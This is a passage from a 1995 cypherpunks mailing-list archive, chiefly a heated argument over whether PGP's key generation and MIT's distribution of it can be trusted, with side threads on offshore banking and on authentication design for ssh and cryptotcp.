>healthy cynicism with a dash of paranoia. I've been talking with a friend for years about PGP and crypto stuff. He wasn't interested. Yesterday, he saw The Net. Now he can't wait to learn how to use it. This is a good thing. I hope it's a popular movie too. Conrad Walton | cwalton at earthlink.net | http://XXX.XXXXXXXXX.XXX/~XXXXXXX/ ------------------------------------------------------------------------------ Without JOY, there is no STRENGTH. Without STRENGTH, all other virtues are worthless. Edward Abbey From fc at all.net Mon Jul 31 19:56:43 1995 From: fc at all.net (Dr. Frederick B. Cohen) Date: Mon, 31 Jul 95 19:56:43 PDT Subject: a hole in PGP In-Reply-To: <199508010233.WAA26805@crypto.com> Message-ID: <9508010250.AA14743@all.net> > >Under what analysis do you construe "It cannot be safely assumed" as > >"near-defamatory"? > > Because you seem to be pointing a finger at specific people. Your > recent messages imply (to me, at least) that you think one or more > members of the MIT PGP project may have deliberately tampered with > some of the PGP code. I don't believe I actually said any such thing. Perhaps you are not reading (or I am not writing) carefully enough. All I think I did was ask why I should believe they have not when they or those like them have done it before. > You think the risk of this sort of thing having > occurred is especially great - greater than with other products, in > fact - with MIT PGP because of some (unspecified) connection you > believe MIT has with NSA. (If I am mistaken here and you don't think > MIT PGP is at special risk, please clarify this - I suspect others got > the same impression). PGP is a product that is specifically disliked by the powers that be because it provides free access to strong cryptography which is against the public policy of the US government. That means that people in that same said government likely feel it is their duty to make certain that they can still read PGP mail. > PGP did not come from "MIT". It came from > specific individuals who work there and who are named in the code and > documentation. They have professional and personal reputations and > feelings just like we all do. Some of these individuals are on or > close to this list. To imply, without offering evidence, that these > people are somehow tainted and that their work should be especially > mistrusted is harmful and hurtful to them. I didn't mean to be hurtful, but I did and do mean to ask why we should believe that PGP is secure. Their blind faith is not adequate for the level of trust being put in PGP - even if they are really sincere. In terms of implication, I don't believe I implied any such thing. I only asked why we should trust them with our individual freedom. > To use such implications > as the entire basis for claims about the security of or risks > associated with specific software does not move our understanding of > things forward. Pointing out something specific, on the other hand, > would move things forward. I think your "arguments" about this > subject so far have been vague, unscholarly, unprofessional, > needlessly personal, and just plain insulting. I obviously disagree, but I still haven't heard a single response along the lines of "here's why we believe it is secure..." I have heard lots of responses along the lines of "believe us or convince yourself..." and "read a 'Request for Comments' and that explains it all", but those leads have not panned out - so far, the RFC tells us that PGP is not secure and the convince yourself argument holds no water. The fact is, you seem to support the idea that PGP is secure without a reasonable basis, and when pushed a bit harder, agree that it probably is not secure. How is it "unscholarly, unprofessional, needlessly personal, and just plain insulting" to question the idea that hundreds of thousands of people are trusting their freedom to software that is probably not secure? I think it is highly unprofessional to try to claim that PGP is secure and to try to bolster that position by claiming that some "Request for Comments" supports it when that same said RFC refutes it. It has been my general impression that "scholarly" means, among other things, questioning the status quo and finding out where the generally accepted ideas break down. I am a professional in the field of information protection, and I consider it highly unprofessional in this field to assume that systems are secure without ample evidence to support it. So far, I see no ample evidence to support the security of PGP's key generation algorithm relative to the concerns I have expressed. Those concerns are fairly specific as far as I am concerned, but if you feel I have to demonstrate a specific attack that works in order to question the adequacy of protection, I think you have it backwards. If the people at MIT feel personally insulted because I have questioned their previously accepted ideas, it's just too bad. I didn't say they had bad breath or that they were arogant or that they were ugly, all I said was that their professional opinions seem to lack adequate foundation when subjected to scrutiny. This is professional comment, not a personal one. As far as the potential that they are working with the NSA to subvert personal privacy, it is a potential, just as it is a potential that I am working with the NSA to undermine confidence in PGP. The issue is and should be, why (specifically) do you believe that PGP is secure. This is how professionals deal with these sorts of questions: If you do not believe it is secure, you should say why not. In my case, I question its security and have given at least one example of how it could be insecure. If you do believe it is secure, you should be able to support your contention with more than reference to RFCs, vague comments, and claiming that you have read the code and didn't catch anything. If you cannot specifically address my question, say so, tell us all that the security of PGP is an open question, and either leave it open or go after closing it. OR come up with another alternative that doesn't ignore my question, doesn't avoid the issue, doesn't appeal to authority that fails to adequately support your contentions, and doesn't claim that I an somehow unprofessional or scholarly for questioning an unproven contention. -- -> See: Info-Sec Heaven at URL http://all.net Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From fc at all.net Mon Jul 31 20:04:22 1995 From: fc at all.net (Dr. Frederick B. Cohen) Date: Mon, 31 Jul 95 20:04:22 PDT Subject: [NOISE] was Re: a hole in PGP In-Reply-To: Message-ID: <9508010256.AA15130@all.net> ... > Anyway, after reading the crap below I have been forced to comment. > For an individual that parades the title of Doctor (and the indication > of intelligence that title should imply) you seem to lack the grasp of what > has been stated over and over again. If you can't study the source code, > find somone that you trust that can! Prove it *doesn't* work before you > knock it. So you claim that software is secure unless it has been shown to be insecure, while I claim it is insecure unless it has been shown to be secure. Which position do you think more sensible? (rhetorical question, does not require any responses). -- -> See: Info-Sec Heaven at URL http://all.net Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From hoz at univel.telescan.com Mon Jul 31 20:07:13 1995 From: hoz at univel.telescan.com (rick hoselton) Date: Mon, 31 Jul 95 20:07:13 PDT Subject: hunting for no hole in PGP Message-ID: <9508010307.AA21546@toad.com> >How do you propose that a user's keystrokes can be analyzed? I have an idea. (many voices groaning...) The "reduced keyspace" and the "subliminal channels" fear both come from the mysterious process of choosing the 128-bit IDEA key. The other bogeyman that I hear the most about in PGP is the public/private key generation. Random numbers scare people, including me. Could PGP use and IDEA key that is the MD5 hash of the "random number" (the way it is currently calculated) concatenated with the message itself? It would be easy to verify that the correct key had been selected. It would be impossible for some "ghost" in the random number routines to use a predictably reduced keyspace, or to send subliminal data, because its output never (directly) gets sent. Something similar could be done during public/private key generation. Have the PGP folks considered doing something similar? Sometimes this seems like a good idea to me, and other times it looks like useless effort and one more opportunity for something to go wrong. Rick F. Hoselton (who doesn't claim to present opinions for others) From tcmay at sensemedia.net Mon Jul 31 20:12:45 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Mon, 31 Jul 95 20:12:45 PDT Subject: Attacks on PGP Message-ID: At 2:51 AM 8/1/95, Matt Blaze wrote: >Tim, > >My impression (based on reviewing papers for the last few CRYPTOs and >EUROCRYPTs) is that the reason for the lack of "practical" papers is >primarily that not very many of them get submitted. In fact, I think Right, but it's a kind of vicious circle. What I meant about cryptanalysis not really be "academic" is that not much status attaches to having broken a specific message. >there actually are a fair number of cryptanalysis papers at CRYPTO, >at least compared with the even smaller number of papers there that >describe new ciphers. Anyway, cryptanalysis IS part of the mainstream >of the academic crypto world these days (consider differential >cryptanalysis, linear cryptanalysis, etc.) I guess this is my bias, as I think of the "differential cryptanalysis" as not really being cryptanalysis :-}. In the sense that it's basic research unto itself, not the grungy cracking of an actual cipher. But you're right that the stuff on Wiener's estimates for a DES-cracking machine, on the differential cryptanalysis work, etc., _does_ make it into Crypto. Ditto for breaking ciphers (showing them to be flawed). I just never see papers describing actual attacks on specific systems...maybe those who do such things are talking? I guess the bottom line of what I'm saying is that if some person or group wants to be a "tiger team" to try to find flaws in PGP, to try to break it, this would be a nifty thing. I doubt anyone on this list disagrees. --Tim May .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." From erc at khijol.intele.net Mon Jul 31 20:15:55 1995 From: erc at khijol.intele.net (Ed Carp [khijol SysAdmin]) Date: Mon, 31 Jul 95 20:15:55 PDT Subject: a hole in PGP In-Reply-To: <9508010103.AA06094@all.net> Message-ID: On Mon, 31 Jul 1995, Dr. Frederick B. Cohen wrote: > That's me - a tinker-toy logician. But why do you believe that PGP can be > trusted? Because someone told you so in email on an Internet forum? I > would hate to bet billions of dollars a day and the lives of hundreds of > thousands of people on that judgement. Oh, yeah, right... > > You're testing my patience. Feeling flush from my New Orleans road trip, I > > went out and bought the commercial version of Eudora, filter-feature and > > all, which means I'm just itching to test it. In other words, it means you > > are flirting with the kill-file, the bozo-filter, more rudely, a > > . > > Ah!!! A threat. You should be aware that threatening homocide is a form > of assault. I will be certain to tell the FBI your exact words... "the > kill-file, the bozo-filter, more rudely, a ." sounds to me > (and may well sound to them) like a threat to commit murder. Just goes to show you that you really CAN tell the idiots on the net - they usually sign some sort of pompous title before their name. -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 801/534-8857 voicemail 801/460-1883 digital pager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi Q. What's the trouble with writing an MS-DOS program to emulate Clinton? A. Figuring out what to do with the other 639K of memory. From mab at crypto.com Mon Jul 31 20:33:43 1995 From: mab at crypto.com (Matt Blaze) Date: Mon, 31 Jul 95 20:33:43 PDT Subject: a hole in PGP In-Reply-To: <9508010250.AA14743@all.net> Message-ID: <199508010341.XAA27354@crypto.com> >> >Under what analysis do you construe "It cannot be safely assumed" as >> >"near-defamatory"? >> >> Because you seem to be pointing a finger at specific people. Your >> recent messages imply (to me, at least) that you think one or more >> members of the MIT PGP project may have deliberately tampered with >> some of the PGP code. > >I don't believe I actually said any such thing. Perhaps you are not >reading (or I am not writing) carefully enough. All I think I did was >ask why I should believe they have not when they or those like them have >done it before. This speaks for itself. "They or those like them," indeed! ... > >The fact is, you seem to support the idea that PGP is secure without a >reasonable basis, and when pushed a bit harder, agree that it probably >is not secure. > I never made any claim that PGP is "secure". Quite the contrary - I've been complaining about the security implications of PGP's monolithic structure and complexity since I first saw the code, though I did state the basis on which I trust it little less than I trust other software of equal complexity. Primarily, however, I jumped in to this discussion to take issue with your unfair implication that there is reason to suspect deliberate wrongdoing on the part of the MIT people. If your remarks are based on some specific information you know about some person or group, please tell us. Otherwise, it would be a shame allow your credibility to taint these people in the backs of people's minds just for the sake of a casual, throwaway rhetorical device. There is no need to raise the specter of an evil conspiracy to make your point. It's irrelevant and beneath you, based on what I've read of your earlier work on viruses. Feel free to have the last word if you'd like, since we seem to AGREE that PGP needs more analysis and scrutiny. -matt From hayden at krypton.mankato.msus.edu Mon Jul 31 20:38:53 1995 From: hayden at krypton.mankato.msus.edu (Robert A. Hayden) Date: Mon, 31 Jul 95 20:38:53 PDT Subject: There's a hole in your crypto, dear Eliza dear Eliza... Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Alright, here's my 2 cents worth for this petty flamewar... Once upon a time, there was PGP 2.3. MIT had nothing to do with it. The population of the net that used the program was fairly small. In addition to being small, they were all (mostly) computer literate people. These people were confident in the security of PGP because the had read and understood the source code. It was checked and declared good. Then, in stepped MIT. I, and a few others, raised concerns about a possible conflict of interest with MIT distributing the code, and encouraged everyone to double check the code for back doors and other NSA nasties. It was checked and declared good. Now, we are in the present. MIT is still part of the equation. However, the demographics of the net have chaged. Fewer people are here that (by percentage) are computer literate to the level to do source code investigations. A few question why they shoudl trust PGP when they don't know it's secure. We, those who have grown up with PGP, point out that it is good, yet that really isn't a great reason to trust it. So the question is, why shoudl non-technical people believe that PGP is good? They don't have the skills to check it for themselves, and you have to admit that the associations of MIT with various TLAs are at the very least concerning. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: PGP Signed with PineSign 2.2 iQCVAwUBMB2F0DokqlyVGmCFAQGhpgP9EIaGx3cHG78pFic0poPsgI/Yo1UNn6SY gRG9kfx3M1XzWITND5m2ywUx1B9n48hGoPfgP9ISvGoXDd5/yHgsY6uEjzZCGaLU tXzace1PvdjL5htH9prvh5GMoghCi34B9cDh01d1U2hKXEypj1pTRA+z+xWUfnGT teMJ9uEaOu0= =2aWA -----END PGP SIGNATURE----- ____ Robert A. Hayden <=> hayden at krypton.mankato.msus.edu \ /__ Finger for Geek Code Info <=> Finger for PGP Public Key \/ / -=-=-=-=-=- -=-=-=-=-=- \/ http://krypton.mankato.msus.edu/~hayden/Welcome.html -----BEGIN GEEK CODE BLOCK----- Version: 3.0 GED/J d-- s:++>: a-- C++(++++) ULU++ P+! L++ E---- W+(-) N++++ K+++ w--- O- M+ V-- PS++>$ PE++>$ Y++ PGP++ t- 5+++ X++ R+++>$ tv+ b+ DI+++ D+++ G++++>$ e++ h r-- y++** ------END GEEK CODE BLOCK------ From nzook at bga.com Mon Jul 31 20:44:59 1995 From: nzook at bga.com (Nathan Zook) Date: Mon, 31 Jul 95 20:44:59 PDT Subject: U.S. Banks are not all that bad In-Reply-To: Message-ID: I might have missed the beginning of this thread, but noting the complaints that Lucky Green has made, I would submit that he may be dealing with a bank in deep financial straights. The outrageous actions he charges follow exactly a pattern noted here in Austin a few years ago. (During the S&L crisis.) When banks start charging significant fees for mundane transactions, hit the exits at a run! Ignore the major rating agencies, as they get their money from the banks. ;-) IANAFA Nathan From fc at all.net Mon Jul 31 20:58:04 1995 From: fc at all.net (Dr. Frederick B. Cohen) Date: Mon, 31 Jul 95 20:58:04 PDT Subject: Stopped at the boarder In-Reply-To: Message-ID: <9508010351.AA18289@all.net> > Maybe Fred can tell us if it's really true > that he was stopped by U.S. Customs and held for many hours at the Canadian > border when going to or returning from a conference where he described > computer viruses.... Not for many hours, but we had an interesting non-discussion, and there was a really thorough search of my bags (every piece of paper was individually examined in great detail and a guard was subtly added to the other side of the line). They looked at every slide, checked out the bags themselves for secret compartments, but the one thing they didn't do was check the contrnts of my floppy disks. Istn't technology wonderful? -- -> See: Info-Sec Heaven at URL http://all.net Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From rsalz at osf.org Mon Jul 31 20:58:16 1995 From: rsalz at osf.org (Rich Salz) Date: Mon, 31 Jul 95 20:58:16 PDT Subject: Set phone permit "wire" taps Message-ID: <9508010357.AA12449@sulphur.osf.org> Sorry to keep cluttering up the list. I'll try to make this my last message in this thread. You did not answer my request. Of course you're under no obligation to do so, but a claim like the following: >I've been arrested too amy times, an done enough local, state, and >federal time to know. Is just too hard to accept without verification. Please tell me, if not the whole list, where and when you've been incarcerated -- preferably at the federal level -- so that I can, say, call the warden and verify. >Now SHOW ME something. Sure, what? If you have more questions after looking at my homepage http://www.osf.org/~rsalz/ let me know. Or for more fun, here's my SSN: 314-15-9265. >You sure question a lotta credentials, >like you've REALLY been somewhere or done something. I don't see how these two parts relate, but I've never done anything cool like you might be thinking of. In my professional life I'm primarily a programmer who's written lots of code, and been able to give away some of it. I just think you're a fake. >Love Always, Kisses to you too, but I'm still waiting for an answer. /r$ From pgf at tyrell.net Mon Jul 31 20:58:44 1995 From: pgf at tyrell.net (Phil Fraering) Date: Mon, 31 Jul 95 20:58:44 PDT Subject: There's a hole in your crypto, dear Eliza dear Eliza... In-Reply-To: Message-ID: <199508010354.AA20144@tyrell.net> Why are the arguments on either side so emotional? Because the alleged possible hole is located in the random number generator portion of the code. Random number generation (or more precisely, strong PRNG procedures) are one of the "hot" buttons of this list in general: no matter how strong the mechanism is, someone can postulate "a weakness in the code" that produces "weak" PRN's or gigabuck NSA computers that can reproduce arbitrary PRN streams. And noone can disprove anything. Because nothing, really, can be "proved" to be random; it's that darn halting problem again. All we have are "reasonable" expectations, which aren't reasonable for a subset of the intended user group. Okay... sometime this week I'll take a long look at the prng routines in what PGP source code I have. I'm doing this in order to keep an open mind, _not_ because I expect to find anything. Other than the labeled PRNG/RNG routines, what needs to be looked at? Phil From 102415.404 at CompuServe.com Mon Jul 31 21:25:35 1995 From: 102415.404 at CompuServe.com (Mabidex1) Date: Mon, 31 Jul 95 21:25:35 PDT Subject: Info Message-ID: <199508010425.AAA25683@dub-mail-svc-1.compuserve.com> Hey guys, I know next to nothing on this sort of stuff, but I do have a friend that works at the phone company...I'm REALLY interested in learning the ins and outs of the trade... have any Ideas where I can start? what files I should read, etc... I would appreciate your help... Mabidex 102415.404 at Compuserve.com From nzook at bga.com Mon Jul 31 21:33:51 1995 From: nzook at bga.com (Nathan Zook) Date: Mon, 31 Jul 95 21:33:51 PDT Subject: OS noise [Was: a hole in PGP] In-Reply-To: <199508010213.AA07127@tyrell.net> Message-ID: On Mon, 31 Jul 1995, Phil Fraering wrote: > For better or for worse, we all must use programs (or collections > of programs) that large or larger: even if PGP could be implemented > in 1 % of the current source code, it would still be running in an > operating system that's cramped in 4 megabytes of ram, because that's > a characteristic of the common modern operating systems. Ahem! Commiedore APOLOGIED when it released its 512K OS a couple of years ago. These things _don't_ have to be this large. > The operating systems PGP is running in are larger than PGP itself; Got that straight! > which isn't a bad idea. This isn't meant to be a disendorsement of > Unix.) Oh, please! Now that I'm back with my direct connection, I want another OS holy war! I want to killfile LOTS of people (or two people in particular). > What OS should I use to do this? Should I just give up on anything > beyond TRS-DOS 6.2? No! Use UltraDos. Much better! Nathan Now THAT's noise.... From enzo at ima.com Mon Jul 31 21:46:21 1995 From: enzo at ima.com (Enzo Michelangeli) Date: Mon, 31 Jul 95 21:46:21 PDT Subject: Zimmermann legal fund In-Reply-To: <199508010129.AA00881@tyrell.net> Message-ID: On Mon, 31 Jul 1995, Phil Fraering wrote: > Date: Mon, 31 Jul 1995 12:12:16 +0800 (HKT) > From: Enzo Michelangeli > > How could it be worse than with the U.S. of A.?? ;-) > > OK... think about Venezuela. It has bad inflation. It has laws against > converting local currency to US dollars on the black market, which is > basically defined as any agency/person/corporate entity exchanging at > a worse rate than the government rate (at least in Venezuela itself; [...] Hey, I was joking: even without arriving to such extremes, banking in Europe is, more often than not, a much worse experience than in USA. My point, anyway, was that there are many offshore banking centres where you may keep accounts denominated in USD, Deutsche Marks, Swiss Francs or other reputable currencies, and also choose branches of reputable international banks, even American ones if you like (Citybank, Chase and many other are represented world-wide). Personally, as bank I like the HSBC Holdings group or other "British-overseas" institutions like Standard Chartered, and as haven currency the Singapore Dollar (due to the very strong balance sheet of that country). In any case, the depositor may choose. Unfortunately, the costs of international transfers of funds are still pretty high, even between branches of the same bank. If I remit funds from Hong Kong to another country, my bank charges me HKD 100. (around USD 20) per operation, flat. In other countries there are additional commissions proportional to the amount (0.125% from Singapore, 0.1% from Macau etc). Sometimes, charges are levied on incoming remittances too. That situation is partly dependent on the regulatory framework, and partly on the oligopolistic nature of the banking business. In any case, it makes international transfers not viable for the settlement of small bills; that may be the reason why First Virtual is still stuck with USA-only merchant accounts. Now, my main objection to opening a US account is that it's unclear whether or not, for simply receiving payments there, a non-resident and non-citizen account holder like myself incurs in any tax liability with Uncle Sam's Inland Revenue. Can anybody on this list shed light on the issue? Last time I checked, the guys at FV weren't sure either. From enzo at ima.com Mon Jul 31 22:17:22 1995 From: enzo at ima.com (Enzo Michelangeli) Date: Mon, 31 Jul 95 22:17:22 PDT Subject: ssh protocol In-Reply-To: <9507312036.AA08394@toad.com> Message-ID: On Mon, 31 Jul 1995, Matthew Ghio wrote: > Tatu Ylonen wrote: > > The basic idea behind the protocol goes roughly like this: > > 1. Exchange session keys using Diffie-Hellman > > 2. Each side sends a signature of the Diffie-Hellman exchange (the > > signature can be with any of a number of algorithms; RSA and > > Elliptic Curve systems have been defined). > > I've been playing with the cryptotcp program available from utopia.. It > has some bugs but works pretty well, if you don't mind waiting 20-30 > seconds at the beginning. It does a Diffie-Hellman exchange and 3DES over > telnet. How hard would it be to add some sort of authentication to this > program? Yes, I'm interested too, also because cryptotcp looks like a good candidate as component of my "SafeSox" pet project, to make unmodified TCP applications secure. Apparently, a sockd daemon could be easily modified to open encrypted TCP connections to remote cryptod daemons, instead of targeting remote servers directly. The next logical step would be a Winsock (or Mac) version of that cryptified sockd, to be run on the same PC where the applications live (not everybody has a UNIX box on the same network). No modifications would be required in cryptod: Unmod. --- [socksifying DLL] === [crypto-sockd] ~~~~ [cryptod] +++ [server] Winsock Client --- = local API call === = local SOCKS connection (same network or same machine) ~~~ = cryptotcp connection across the Internet +++ = cleartext TCP connection on the same network or same machine Another area where I would appreciate analysis by someone more competent than myself is cryptotcp's random key generator. Even though the randomizer (in random.c) is called several times, stirring in the pool also quantities of entropy depending on the time spent during the establishment of the TCP connection, I doubt that the total resulting entropy can be that high. Perhaps, adding some purely local data a' la randseed.bin (not available to an eavesdropper) would reduce the risk of the scheme being brute-forced. From jirib at sweeney.cs.monash.edu.au Mon Jul 31 22:51:57 1995 From: jirib at sweeney.cs.monash.edu.au (Jiri Baum) Date: Mon, 31 Jul 95 22:51:57 PDT Subject: a hole in PGP In-Reply-To: <9508010250.AA14743@all.net> Message-ID: <199508010544.PAA07308@sweeney.cs.monash.edu.au> Hello fc at all.net (Dr. Frederick B. Cohen) and mab at crypto.com (Matt Blaze) and cypherpunks at toad.com I'm afraid I missed the start of this thread, sorry if I'm repeating... ... > The fact is, you seem to support the idea that PGP is secure without a > reasonable basis, and when pushed a bit harder, agree that it probably > is not secure. The problem is that "secure" is not really something that can be proved. (I'm not sure if that's a theoretical or a practical fact, but it remains.) For one thing, I'm not even sure the RSA algorithm itself is secure. (At least I've never heard of a proof; have you?) As long as I'm using PGP to send letters to grandma, the cost (to me) of a successful attack is small. I therefore expend little effort to verify that it is secure. If/when I start to use it for more serious applications, I will read the source code. I might even modify it (eg. accord less entropy per keystroke) if I'm not happy with it. If circumstances warranted, I could re-implement it from the appropriate RFC (is it out yet or still draft?). However, in such circumstances, I very much suspect a one-time-pad would be used. > This is how professionals deal with these sorts of questions: > > If you do not believe it is secure, you should say why not. I do not believe that it can be proven secure. > In my case, I question its security and have given at least one > example of how it could be insecure. If you doubt the key-gen routine: * you are certainly free to make up your own keys any way you like, * write your own and argue that it's better, and/or * find a way to break the key-gen routine. > If you do believe it is secure, you should be able to support > your contention with more than reference to RFCs, vague > comments, and claiming that you have read the code and didn't > catch anything. Adding to the list: * I've never heard of anyone catching anything (except the headers on clearsigned messages problem). > If you cannot specifically address my question, say so, tell us > all that the security of PGP is an open question, and either > leave it open or go after closing it. The security of anything is an open question. You shouldn't spend more on proving security than a breach would cost. Hope I'm making sense... Jiri -- If you want an answer, please mail to . On sweeney, I may delete without reading! PGP 463A14D5 (but it's at home so it'll take a day or two) From stewarts at ix.netcom.com Mon Jul 31 23:23:17 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 31 Jul 95 23:23:17 PDT Subject: ssh protocol Message-ID: <199508010620.XAA28764@ix6.ix.netcom.com> Matt Ghio wrote (on cypherpunks): >I've been playing with the cryptotcp program available from utopia.. It >has some bugs but works pretty well, if you don't mind waiting 20-30 >seconds at the beginning. It does a Diffie-Hellman exchange and 3DES over >telnet. How hard would it be to add some sort of authentication to this >program? I haven't actually compiled the code (it's not very DOS-friendly), but it looks easily modified; some parts of the problem are still hard, such as identifying the client to the server. Some issues to deal with for adding authentication: 0) RSAREF2.0 would have been nice, and comes with D-H and DES. 1) The option negotiation is simple but hard-coded; it would be easy to add one thing at a time, but would benefit from a more flexible option-negotiator. That would also let you pretend it was just a general-purpose telnet-with- various-processors and avoid ITAR restrictions for the authentication-plus-compression bones version, but the authors, not being Yankees, don't have to worry about that. 2) Authentication means that some process on each machine is willing to make a digital signature using a private key - how do you store that key safely? For a client operated by a human, that's not a big problem; for a server, or a client operated by a program without a direct user-interface, it's harder. Do you just leave the key in a file (trusting root?) Do you only start the server daemon by hand? For most Unix applications, I suppose a root-read-only file containing the key is OK, since if a cracker can read that file you've got far more serious problems (and the cracker can take over your email anyway.) 3) One big difficulty in authentication systems is securely but conveniently exchanging authentication parameters; you don't want to risk man-in-the-middle by trusting keys you got from the other side (otherwise you could use plain D-H), but getting keys from a keyserver is slow and hard to integrate, and requiring the other side to already have your key parameters limits your usefulness. 3A) How do you know who you're talking to so you know which authentication data to use? For the client, that's pretty easy - the client knows it's calling server at foo.bar.edu, so it can get the keys in advance and not worry. (It still needs the PGP web-of-trust or X.509 hierarchy to validate the keys.) But how does the server know who the client is? IP address? What if it's spoofed? What if it does a DNS lookup, which gets spoofed? You could use a password-file equivalent, but that does mean you can only send mail to people who trust you? 3B) How do you do error recovery in PGP, i.e. you either can't find the other side's keys, or can find them but can't validate them because you don't have a web of trust that gets from you to them. Do you just fail the call? (That's secure but boring.) If you complete the call anyway, that means there's a major security risk, which is that Bad Guys can spoof keys by sending you keys you can't validate. 3C) If you use X.509 hierarchical certification, you _can_ just hand across the certificate instead of waiting for a PGP keyserver to respond, since the web of trust is built-in if you're part of the same hierarchy, but there's still the problem (for the server) of knowing whose certificate to use. #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- # Crypto in 3-4 lines of perl --> http://dcs.ex.ac.uk/~aba/ From stewarts at ix.netcom.com Mon Jul 31 23:23:45 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 31 Jul 95 23:23:45 PDT Subject: Currency risk on bank accounts (Was: Zimmermann legal fund) Message-ID: <199508010621.XAA28791@ix6.ix.netcom.com> >> > > The US banking industry has gone to the dogs. The day a non-US bank offers >> > > an account that can be accessed over the net will be the day I close my US >> > > accounts. Some of the Channel Island banks offer accounts with ATM cards; I think some of them are in Jersey (you don't have to remind people you didn't say _New_ Jersey :-) >I open an account with U.S. $$ in a foreign bank who uses francs ... a month >later the franc loses 20 % of it's value as compared to the U.S. dollar. Happens to me all the time - I deposit my money in a dollar-based account, the dollar takes a dive relative to the Yen, so my account's worth 20% less in new Japanese cars... Most of the banks in major European banking centers and other banking-haven countries will let you have accounts in your choice of major currencies, and a number of the smaller countries have local currencies that keep parity with the US dollar or British pound. That means your account really has X US dollars in it, not X-US-dollars-converted-to-francs-on-deposit, or maybe X Bahamian dollars which are officially worth X US dollars but may be harder to withdraw quickly. There is still some risk that (for example) the Bahamas government may decide to default on its foreign debt by suddenly declaring the Bahamas dollar to no longer match US dollars, but you can only get away with that sort of thing once, so it's a desperation move, the kind of thing you do just before or after the revolution. You're more at risk from small private banks that are offering high rates of interest on foreign deposits because they're ripping off their depositors, e.g. BCCI or Nugan Hand, but that's more risk in the Caribbean than Europe (where the big risk is that they're paying you less interest than you might get in the US, or where the local tax on bank-interest may be higher than your US tax rate.) #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- # Crypto in 3-4 lines of perl --> http://dcs.ex.ac.uk/~aba/ From warlord at ATHENA.MIT.EDU Mon Jul 31 23:59:00 1995 From: warlord at ATHENA.MIT.EDU (Derek Atkins) Date: Mon, 31 Jul 95 23:59:00 PDT Subject: a hole in PGP? NOT! In-Reply-To: <9508010250.AA14743@all.net> Message-ID: <199508010658.CAA18603@charon.MIT.EDU> This might seem a bit long, and I'd like to apologize to the real cypherpunks for my ranting. > > Because you seem to be pointing a finger at specific people. Your > > recent messages imply (to me, at least) that you think one or more > > members of the MIT PGP project may have deliberately tampered with > > some of the PGP code. > > I don't believe I actually said any such thing. Perhaps you are not > reading (or I am not writing) carefully enough. All I think I did was > ask why I should believe they have not when they or those like them have > done it before. You have. I doubt it was intentional, but you have, continually. Here are some snipets of things you've said. First, you say that it is a rational concern since PGP was taken over by us: > The term paranoid is inappropriate in this context. Paranoia refers to > an irrational fear, while I am expressing a rational concern over a > system that has been taken over by a (partially) government funded > university and which has not been properly verified. The history of > cryptography (as they say) is (quite literally) littered with the dead > bodies of people killed because somebody else thought a cryptosystem was > good enough when it was not. Then you talk about the MIT version as if it were the original thing: > Why (specifically) do you think the MIT version of PGP has no > backdoors and is not subject to attacks such as the one outlined in my > previous posting? PGP 2.0 was released in September, 1992, from Europe, and many many people have been examining it ever since. I truly belive that there are no backdoors. Does that mean the program is completely bug-free? Hardly. Does it mean that some attack against PGP wont be discovered in the future? I dont know, I'm not a diviner, I cannot forsee the future, and I have no idea what technology will come in the future. For all I know, someone will prove that P=NP and all this will be for naught. Anyways, to get back to my claims of your hurtful statements: > Why (specifically) do you think so? Because you claim it? Because the > MIT maintainer claims it? You say MIT is not associated with the NSA, > but they have historically been funded by the NSA and other federal > agencies for work on information security. Do you really think that the > only information protected by PGP is dirty pictures? Do you somehow > think that MIT and the NSA are above that sort of thing? All you have to > do is look at history, and it should be clear that this appeal to > authority is often used by those trying to cover things up. If you know I DO NOT GET PAID FOR ANY WORK I DO ON PGP! I HAVE NEVER RECEIVED A DIME FOR MY WORK. I WORK ON PGP BECAUSE I BELIEVE IN IT. Having said that, I cannot BELIEVE you would have the Balls to say that the NSA has bought me. Go re-read what you've said. You have just said that the MIT PGP team, through MIT, is bound to be covering something up because of historical fact. I have never said "Believe me when I said PGP is secure". I have continually asked for you to check on the security yourself. But you have continually refused to do that, and asked why it is secure! So, you refuse to look for yourself, and you refuse to believe it when you are told. So, what the hell do you want? Do you want a line-by-line examination of the code???? Sheesh! > It cannot be safely assumed that any program is clean or that any one > person or group is not involved with intentionally subverting security. > That violates the fundamental principles of information protection. You're right, which is why the source code is publically available. I would wholeheartedly agree with you if only binaries are shipped, but the source is available. Anyone can look through and verify the code. Anyone can try to find weaknesses. In fact, everyone is encouraged to do so. I don't see how _this_ "violates the fundamental principles of information protection". > You might be, but even if you are not, that doesn't mean there are no > back doors. Your inability to detect a backdoor gives me little > confidence, since this is at least an NP-complete problem and, with all > due respect, today, nobody can prove that PGP is free of backdoors I think I've finally figured out where you are completely confused!!! You are confusing "back door" with "bug". FYI: A back door is usually a means to make it easy for someone to get into a system. For example, if I put in code so that I could read every PGP message by typing the passphrase "Setec Astronomy", that would be a backdoor. The fact that httpd was exploitable, or sendmail holes, or etc. are BUGS, not Back doors. Your problem is that you are using these terms interchangably. THEY ARE NOT THE SAME. Putting in a backdoor has the connotation of intent. A bug is an accidental occurrance that was a side effect of poor coding, a typo, carelessness, confusion, inconsistency, etc. A back door, on the other hand, is a DELIBERATE ATTEMPT TO REDUCE OR CIRCUMVENT SECURITY! > "...Choosing random quantities to foil a resourceful and motivated > adversary is surprisingly difficult. ...recommends the use of truly > random hardware techniques and shows that the existing hardware on many > systems can be used for this purpose." > > PGP does not use "truly random hardware techniques" Oh? It doesnt? How can you 